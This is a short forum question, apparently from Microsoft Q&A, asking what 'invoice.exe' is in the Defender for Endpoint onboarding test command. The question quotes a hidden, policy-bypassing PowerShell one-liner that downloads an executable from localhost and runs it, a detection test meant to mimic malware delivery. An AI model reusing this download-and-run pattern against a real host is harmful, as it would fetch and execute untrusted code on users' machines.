Defender Onboarding command

Irin Sultana 377 Reputation points
2024-07-10T16:58:32.1366667+00:00

Hi,

I have question about defender onboarding command.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-WDATP-test\invoice.exe');Start-Process 'C:\test-WDATP-test\invoice.exe'

What's the invoice.exe?

Thank You!

Irin

Microsoft Security | Microsoft Defender | Microsoft Defender for Identity
{count} votes

Your answer

Answers can be marked as Accepted Answers by the question author, which helps users to know the answer solved the author's problem.